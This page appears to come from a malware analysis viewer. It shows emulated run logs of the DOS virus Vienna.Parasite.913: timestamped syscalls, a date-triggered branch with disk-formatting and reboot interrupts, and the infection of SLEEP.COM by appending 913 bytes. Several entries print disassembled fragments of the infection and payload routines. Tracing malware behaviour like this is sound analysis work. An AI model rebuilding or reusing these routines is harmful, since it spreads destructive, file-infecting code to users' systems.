Sample viewer

vx.netlux.org/Virus.DOS.Vienna.Parasite.913

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:02:26.854274003Z	47	PC: 12a7d \| Get disk transfer address
2018-12-17T22:02:26.855935595Z	26	PC: 12a62 \| Set disk transfer address
2018-12-17T22:02:26.85767207Z	42	PC: 12a8c \| Get date 0x12a8c: cmp al, 1 0x12a8e: jge 0x12a93 0x12a90: jmp 0x12ade 0x12a92: nop 0x12a93: cmp al, 1 0x12a95: ja 0x12ade 0x12a97: jmp 0x12a9a 0x12a99: nop 0x12a9a: mov dl, 2 0x12a9c: mov ah, 5 0x12a9e: mov dh, 0x80 0x12aa0: mov ch, 0 0x12aa2: int 0x13 0x12aa4: mov cx, 0x14 0x12aa7: push cx 0x12aa8: call 0x12ab5 0x12aab: mov cx, 0x4000 0x12aae: loop 0x12aae 0x12ab0: pop cx 0x12ab1: loop 0x12aa7

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1392,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:30.680946928Z	47	PC: 12a7d \| Get disk transfer address
2018-12-25T11:43:30.683054659Z	26	PC: 12a62 \| Set disk transfer address
2018-12-25T11:43:30.684220459Z	42	PC: 12a8c \| Get date 0x12a8c: cmp al, 1 0x12a8e: jge 0x12a93 0x12a90: jmp 0x12ade 0x12a92: nop 0x12a93: cmp al, 1 0x12a95: ja 0x12ade 0x12a97: jmp 0x12a9a 0x12a99: nop 0x12a9a: mov dl, 2 0x12a9c: mov ah, 5 0x12a9e: mov dh, 0x80 0x12aa0: mov ch, 0 0x12aa2: int 0x13 0x12aa4: mov cx, 0x14 0x12aa7: push cx 0x12aa8: call 0x12ab5 0x12aab: mov cx, 0x4000 0x12aae: loop 0x12aae 0x12ab0: pop cx 0x12ab1: loop 0x12aa7
2018-12-25T11:43:30.686509158Z	44	PC: 12ae2 \| Get time 0x12ae2: and dh, 0xf 0x12ae5: cmp dh, 3 0x12ae8: jb 0x12aa4 0x12aea: cmp dh, 3 0x12aed: ja 0x12b1a 0x12aef: int 0x19 0x12af1: mov ah, 0x47 0x12af3: xor dl, 0 0x12af6: add si, 0 0x12af9: nop 0x12afa: int 0x21 0x12afc: jb 0x12b1a 0x12afe: mov ah, 0x3b 0x12b00: mov dx, si 0x12b02: add dx, 0x40 0x12b05: nop 0x12b06: int 0x21 0x12b08: mov word ptr [bx + 0x44], di 0x12b0b: nop 0x12b0c: mov si, bx
2018-12-25T11:43:30.689497021Z	78	PC: 12b9e \| Find first file
2018-12-25T11:43:30.698820776Z	67	PC: 12bdf \| Get or set file attributes
2018-12-25T11:43:30.705563392Z	67	PC: 12bf1 \| Get or set file attributes
2018-12-25T11:43:30.724272552Z	61	PC: 12bfc \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:30.732633345Z	87	PC: 12c08 \| Get or set file date and time
2018-12-25T11:43:30.734219344Z	44	PC: 12c14 \| Get time 0x12c14: and dh, 7 0x12c17: jmp 0x12c1a 0x12c19: nop 0x12c1a: mov ah, 0x3f 0x12c1c: mov cx, 3 0x12c1f: mov dx, 0x2a 0x12c22: nop 0x12c23: add dx, si 0x12c25: int 0x21 0x12c27: jb 0x12c84 0x12c29: cmp ax, 3 0x12c2c: jne 0x12c84 0x12c2e: mov ax, 0x4202 0x12c31: mov cx, 0 0x12c34: mov dx, 0 0x12c37: int 0x21 0x12c39: jb 0x12c84 0x12c3b: mov cx, ax 0x12c3d: sub ax, 3 0x12c40: mov word ptr [si + 0x2e], ax
2018-12-25T11:43:30.736519148Z	63	PC: 12c27 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:43:30.744204543Z	66	PC: 12c39 \| Move file pointer
2018-12-25T11:43:30.745717699Z	64	PC: 12c63 \| Write file or device (Write 913 bytes on handle 5)
2018-12-25T11:43:30.755827242Z	66	PC: 12c75 \| Move file pointer
2018-12-25T11:43:30.758075435Z	64	PC: 12c84 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:43:30.765203769Z	87	PC: 12c97 \| Get or set file date and time
2018-12-25T11:43:30.766803498Z	62	PC: 12c9b \| Close file
2018-12-25T11:43:30.775830268Z	67	PC: 12caa \| Get or set file attributes
2018-12-25T11:43:30.786636016Z	26	PC: 12cb7 \| Set disk transfer address

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1392,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:30.757189498Z	47	PC: 12a7d \| Get disk transfer address
2018-12-25T11:43:30.759259373Z	26	PC: 12a62 \| Set disk transfer address
2018-12-25T11:43:30.760596601Z	42	PC: 12a8c \| Get date 0x12a8c: cmp al, 1 0x12a8e: jge 0x12a93 0x12a90: jmp 0x12ade 0x12a92: nop 0x12a93: cmp al, 1 0x12a95: ja 0x12ade 0x12a97: jmp 0x12a9a 0x12a99: nop 0x12a9a: mov dl, 2 0x12a9c: mov ah, 5 0x12a9e: mov dh, 0x80 0x12aa0: mov ch, 0 0x12aa2: int 0x13 0x12aa4: mov cx, 0x14 0x12aa7: push cx 0x12aa8: call 0x12ab5 0x12aab: mov cx, 0x4000 0x12aae: loop 0x12aae 0x12ab0: pop cx 0x12ab1: loop 0x12aa7
2018-12-25T11:43:30.762925493Z	44	PC: 12ae2 \| Get time 0x12ae2: and dh, 0xf 0x12ae5: cmp dh, 3 0x12ae8: jb 0x12aa4 0x12aea: cmp dh, 3 0x12aed: ja 0x12b1a 0x12aef: int 0x19 0x12af1: mov ah, 0x47 0x12af3: xor dl, 0 0x12af6: add si, 0 0x12af9: nop 0x12afa: int 0x21 0x12afc: jb 0x12b1a 0x12afe: mov ah, 0x3b 0x12b00: mov dx, si 0x12b02: add dx, 0x40 0x12b05: nop 0x12b06: int 0x21 0x12b08: mov word ptr [bx + 0x44], di 0x12b0b: nop 0x12b0c: mov si, bx
2018-12-25T11:43:30.765712932Z	78	PC: 12b9e \| Find first file
2018-12-25T11:43:30.771690516Z	67	PC: 12bdf \| Get or set file attributes
2018-12-25T11:43:30.7774327Z	67	PC: 12bf1 \| Get or set file attributes
2018-12-25T11:43:30.79692044Z	61	PC: 12bfc \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:30.807895508Z	87	PC: 12c08 \| Get or set file date and time
2018-12-25T11:43:30.811430976Z	44	PC: 12c14 \| Get time 0x12c14: and dh, 7 0x12c17: jmp 0x12c1a 0x12c19: nop 0x12c1a: mov ah, 0x3f 0x12c1c: mov cx, 3 0x12c1f: mov dx, 0x2a 0x12c22: nop 0x12c23: add dx, si 0x12c25: int 0x21 0x12c27: jb 0x12c84 0x12c29: cmp ax, 3 0x12c2c: jne 0x12c84 0x12c2e: mov ax, 0x4202 0x12c31: mov cx, 0 0x12c34: mov dx, 0 0x12c37: int 0x21 0x12c39: jb 0x12c84 0x12c3b: mov cx, ax 0x12c3d: sub ax, 3 0x12c40: mov word ptr [si + 0x2e], ax
2018-12-25T11:43:30.813892562Z	63	PC: 12c27 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:43:30.822715588Z	66	PC: 12c39 \| Move file pointer
2018-12-25T11:43:30.82450129Z	64	PC: 12c63 \| Write file or device (Write 913 bytes on handle 5)
2018-12-25T11:43:30.833018558Z	66	PC: 12c75 \| Move file pointer
2018-12-25T11:43:30.835038436Z	64	PC: 12c84 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:43:30.843467195Z	87	PC: 12c97 \| Get or set file date and time
2018-12-25T11:43:30.844950902Z	62	PC: 12c9b \| Close file
2018-12-25T11:43:30.853684443Z	67	PC: 12caa \| Get or set file attributes
2018-12-25T11:43:30.863797042Z	26	PC: 12cb7 \| Set disk transfer address

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1392,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:30.768707086Z	47	PC: 12a7d \| Get disk transfer address
2018-12-25T11:43:30.771091117Z	26	PC: 12a62 \| Set disk transfer address
2018-12-25T11:43:30.772377206Z	42	PC: 12a8c \| Get date 0x12a8c: cmp al, 1 0x12a8e: jge 0x12a93 0x12a90: jmp 0x12ade 0x12a92: nop 0x12a93: cmp al, 1 0x12a95: ja 0x12ade 0x12a97: jmp 0x12a9a 0x12a99: nop 0x12a9a: mov dl, 2 0x12a9c: mov ah, 5 0x12a9e: mov dh, 0x80 0x12aa0: mov ch, 0 0x12aa2: int 0x13 0x12aa4: mov cx, 0x14 0x12aa7: push cx 0x12aa8: call 0x12ab5 0x12aab: mov cx, 0x4000 0x12aae: loop 0x12aae 0x12ab0: pop cx 0x12ab1: loop 0x12aa7